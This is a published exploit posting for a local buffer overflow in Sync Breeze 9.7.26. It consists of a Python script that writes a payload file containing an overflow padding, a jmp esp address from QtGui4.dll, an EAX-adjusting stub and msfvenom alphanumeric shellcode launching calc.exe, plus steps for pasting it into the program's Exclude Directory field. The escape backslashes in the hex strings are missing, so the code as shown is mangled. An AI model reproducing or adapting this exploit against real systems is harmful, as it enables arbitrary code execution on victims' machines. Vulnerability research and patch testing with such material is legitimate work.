Sync Breeze 9.7.26 Buffer Overflow
Posted on 13 June 2017
#!/usr/bin/python ############################################################################### # Exploit Title: Sync Breeze v9.7.26 - Local Buffer Overflow # Date: 11-06-2017 # Exploit Author: @abatchy17 -- www.abatchy.com # Vulnerable Software: Sync Breeze v9.7.26 (Freeware, Pro and Ultimate) # Vendor Homepage: http://www.syncbreeze.com # Version: 9.7.26 # Software Link: http://www.syncbreeze.com/downloads.html (Freeware, Pro and Ultimate) # Tested On: Windows XP SP3 (x86), Win7 SP1 (x86) # # To trigger the exploit: # 1. click "Add" # 2. enter any command name # 3. On new window, scroll down to "Exclude" # 4. Click "Add Exclude Directory" # 4. Paste text in exploit.txt into "Directory" field # ############################################################################## a = open("exploit.txt", "w") # Message= 0x651f214e : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:Program FilesSync BreezeinQtGui4.dll) jmpesp = "x4ex21x1fx65" badchars = "x0ax0d" # And 0x80 to 0xff # msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "x0ax0d" buf = "" buf += "x50x59x49x49x49x49x49x49x49x49x49x49x49" buf += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30" buf += "x41x30x41x6bx41x41x51x32x41x42x32x42x42" buf += "x30x42x42x41x42x58x50x38x41x42x75x4ax49" buf += "x6bx4cx5ax48x4fx72x57x70x75x50x43x30x43" buf += "x50x4bx39x4dx35x44x71x79x50x63x54x6ex6b" buf += "x62x70x76x50x6ex6bx42x72x46x6cx6ex6bx63" buf += "x62x62x34x6cx4bx43x42x76x48x36x6fx68x37" buf += "x73x7ax46x46x74x71x49x6fx4ex4cx57x4cx55" buf += "x31x51x6cx35x52x46x4cx51x30x6ax61x6ax6f" buf += "x64x4dx67x71x6bx77x79x72x68x72x70x52x70" buf += "x57x6cx4bx53x62x36x70x6cx4bx52x6ax67x4c" buf += "x4cx4bx50x4cx62x31x42x58x79x73x32x68x37" buf += "x71x4ax71x73x61x4ex6bx63x69x31x30x35x51" buf += "x69x43x4cx4bx50x49x64x58x58x63x46x5ax32" buf += "x69x6ex6bx36x54x4ex6bx57x71x38x56x65x61" buf += "x49x6fx6ex4cx69x51x7ax6fx66x6dx46x61x69" buf += "x57x70x38x39x70x33x45x39x66x35x53x31x6d" buf += "x68x78x75x6bx73x4dx71x34x70x75x38x64x33" buf += "x68x4ex6bx32x78x51x34x65x51x39x43x31x76" buf += "x4cx4bx64x4cx32x6bx6ex6bx62x78x65x4cx47" buf += "x71x59x43x4cx4bx44x44x4cx4bx56x61x38x50" buf += "x6fx79x52x64x54x64x34x64x63x6bx73x6bx50" buf += "x61x50x59x71x4ax56x31x59x6fx59x70x33x6f" buf += "x53x6fx71x4ax4cx4bx44x52x68x6bx6ex6dx53" buf += "x6dx62x4ax56x61x4cx4dx6bx35x6dx62x75x50" buf += "x45x50x75x50x32x70x32x48x76x51x4ex6bx30" buf += "x6fx6fx77x39x6fx4ex35x4dx6bx58x70x4dx65" buf += "x4ex42x53x66x62x48x6dx76x4ax35x6dx6dx4d" buf += "x4dx69x6fx79x45x57x4cx46x66x53x4cx56x6a" buf += "x6fx70x49x6bx6dx30x33x45x33x35x4dx6bx50" buf += "x47x37x63x74x32x52x4fx53x5ax43x30x53x63" buf += "x49x6fx38x55x52x43x63x51x50x6cx65x33x54" buf += "x6ex62x45x54x38x62x45x55x50x41x41" junk = "C" * (239) llamaleftovers = ( "x54" # push ESP "x58" # pop EAX "x05x55x55x55x55" # add EAX, 0x55555555 "x05x55x55x55x55" # add EAX, 0x55555555 "x05x56x56x55x55" # add EAX, 0x55555656 -> EAX = old ESP + 0x100, shellcode generated should start exactly here as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode ) data = "A"*4108 + jmpesp + llamaleftovers + junk + buf a.write(data) a.close()